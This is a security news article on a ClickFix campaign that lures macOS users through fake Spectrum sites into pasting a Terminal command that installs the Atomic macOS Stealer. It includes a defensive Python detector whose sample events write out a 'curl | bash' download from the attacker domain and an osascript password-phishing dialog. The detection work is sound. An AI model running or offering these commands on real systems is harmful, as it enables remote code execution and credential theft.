
Atomic macOS Stealer Malware

Cybersecurity researchers have uncovered a new malware campaign that leverages the deceptive social engineering tactic known as ClickFix to distribute Atomic macOS Stealer (AMOS), an information-stealing malware designed to compromise Apple macOS systems.

Typosquat Tactics: Impersonating Spectrum

The attackers behind this campaign employ typosquat domains mimicking the U.S.-based telecom provider Spectrum, using fraudulent websites like panel-spectrum.net and spectrum-ticket.net to lure unsuspecting users. These look-alike domains are crafted to appear legitimate, increasing the likelihood of user trust and interaction.

Malicious Shell Script: The Hidden Payload

macOS users who visit these spoofed sites are served a malicious shell script. The script prompts the victim for their system password, then uses it to harvest credentials, bypass macOS security controls, and install a variant of AMOS for further exploitation. It relies on native macOS commands rather than dropping additional tooling, which keeps its footprint small and makes it harder to spot.

Traces of Origin: Russian-Language Code Comments

Evidence suggests that Russian-speaking cybercriminals may be behind this campaign. Researchers found Russian-language comments embedded in the malware's source code, pointing toward the likely geographical and linguistic origin of the threat actors.

Deceptive CAPTCHA: The ClickFix Lure

The attack begins with a fake hCaptcha verification message that claims to be checking the user's connection security. After clicking the "I am human" checkbox, users are met with a fake error message: "CAPTCHA verification failed." They are then prompted to proceed with an "Alternative Verification."

This action copies a malicious command to the clipboard and displays instructions based on the user's operating system. On macOS, victims are guided to paste and run the command in the Terminal app, initiating the download of AMOS.
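The chain above (a one-liner pasted into Terminal that pulls down a script, which then prompts for the password) leaves a recognisable trail in process telemetry. The following is an added example, not code from the original page or from the researchers who reported the campaign: a heuristic scorer that runs over process-execution events of the shape an EDR agent or the macOS unified log would provide. The event field names, the sample events, the scoring weights, and the assumption that the password prompt is an osascript "with hidden answer" dialog are all mine; the two look-alike domains come from the page.

```python
"""Heuristic detection of a ClickFix-style Terminal paste chain on macOS.

Added example, not code from the original page. It scores constructed
process-execution events against the chain described in the text. Field
names, sample events, and weights are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ProcEvent:
    ts: str        # ISO-8601 timestamp
    parent: str    # parent process name
    image: str     # process name
    cmdline: str   # full command line


@dataclass
class Alert:
    ts: str
    score: int
    reasons: List[str] = field(default_factory=list)
    cmdline: str = ""


TERMINALS = {"Terminal", "iTerm2"}
SHELLS = {"bash", "sh", "zsh"}
# Look-alike domains named on the page; extend with your own blocklist.
WATCHLIST = {"panel-spectrum.net", "spectrum-ticket.net"}

# Remote content piped straight into a shell: the pasted one-liner.
DOWNLOAD_PIPE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")
# Inline base64 decoding, a common way to hide the real command in the paste.
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# AppleScript password dialog. Assumption: the page says the script prompts for
# the system password but does not name the mechanism; this is one native way.
HIDDEN_ANSWER = re.compile(r"\bosascript\b.*?display dialog.*?with hidden answer", re.S)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

ALERT_THRESHOLD = 4  # chosen so that a plain "curl | bash" alone does not fire


def on_watchlist(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in WATCHLIST)


def score_event(ev: ProcEvent) -> Optional[Alert]:
    """Return an Alert when the event's weighted indicators reach the threshold."""
    score, reasons = 0, []
    if DOWNLOAD_PIPE.search(ev.cmdline):
        score += 2
        reasons.append("remote content piped into a shell")
    if BASE64_DECODE.search(ev.cmdline):
        score += 2
        reasons.append("base64 decode in pipeline")
    for host in URL_HOST.findall(ev.cmdline):
        if on_watchlist(host):
            score += 3
            reasons.append(f"watchlisted host {host}")
            break
    if HIDDEN_ANSWER.search(ev.cmdline):
        score += 3
        reasons.append("osascript hidden-answer password dialog")
    # Context weight: launched interactively from a terminal, or by a shell script.
    if ev.parent in TERMINALS or ev.parent in SHELLS:
        score += 1
        reasons.append(f"spawned by {ev.parent}")
    if score >= ALERT_THRESHOLD:
        return Alert(ev.ts, score, reasons, ev.cmdline)
    return None


def detect(events: List[ProcEvent]) -> List[Alert]:
    return [a for a in (score_event(e) for e in events) if a]


# Constructed sample telemetry. Paths and dialog text are made up.
SAMPLE_EVENTS = [
    # A developer installing a tool the usual way: noisy on its own, below threshold.
    ProcEvent("2025-06-01T10:00:00Z", "Terminal", "zsh",
              "curl -fsSL https://example.org/install.sh | bash"),
    # ClickFix stage 1: the pasted "Alternative Verification" command.
    ProcEvent("2025-06-01T10:05:12Z", "Terminal", "zsh",
              "curl -fsSL https://panel-spectrum.net/verify | bash"),
    # ClickFix stage 2: the downloaded script asks for the login password.
    ProcEvent("2025-06-01T10:05:14Z", "bash", "osascript",
              "osascript -e 'display dialog \"macOS needs your password to continue\" "
              "default answer \"\" with hidden answer'"),
    # Unrelated decode in a shell; below threshold.
    ProcEvent("2025-06-01T10:07:00Z", "zsh", "base64",
              "echo aGVsbG8= | base64 -d"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.ts} score={a.score} {'; '.join(a.reasons)}\n  {a.cmdline}")
```

The weighting matters more than any single regex: `curl ... | bash` from a terminal is exactly how many legitimate installers are run, so on its own it stays under the threshold, while the same pattern pointing at a watchlisted host, or a shell script popping a hidden-answer password dialog, crosses it. In production you would correlate the stage 1 and stage 2 events by process ancestry and time window rather than scoring them independently.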

Sloppy Execution: Clues in the Code

Despite the campaign's dangerous intent, researchers noted inconsistencies in the attack infrastructure. Poor logic and programming errors were observed in the delivery pages, such as:

  • PowerShell commands being copied for Linux users.
  • Windows-specific instructions shown to both Windows and Mac users.
  • Front-end mismatches between the displayed OS and the instructions.

These mistakes indicate a hastily built or poorly maintained attack infrastructure.

The Rise of ClickFix: An Expanding Threat Vector

This development is part of a growing trend in the use of the ClickFix tactic across multiple malware campaigns over the past year. Threat actors consistently rely on similar tactics, techniques, and procedures (TTPs) for initial access, most commonly:

  • Spear phishing
  • Drive-by downloads
  • Malicious links shared via trusted platforms like GitHub

Fake Fixes, Real Damage: Social Engineering at Its Worst

Victims are tricked into believing they are resolving a benign technical issue. In reality, they are executing harmful commands that install malware. This form of social engineering is highly effective at bypassing user awareness and standard security mechanisms.

Growing Impact: Global Spread and Diverse Payloads

ClickFix campaigns have been detected across customer environments in the United States and in the EMEA region (Europe, the Middle East, and Africa). These attacks are increasingly diversified, delivering not just stealers like AMOS but also trojans and ransomware. While the payloads vary, the core methodology remains consistent: manipulating the user into running the attacker's command themselves.

Conclusion: Vigilance Required

This campaign underscores the importance of ongoing vigilance, user education, and robust security controls. As social engineering tactics like ClickFix evolve, organizations and individuals alike must stay informed and prepared to recognize and block such deceptive threats.
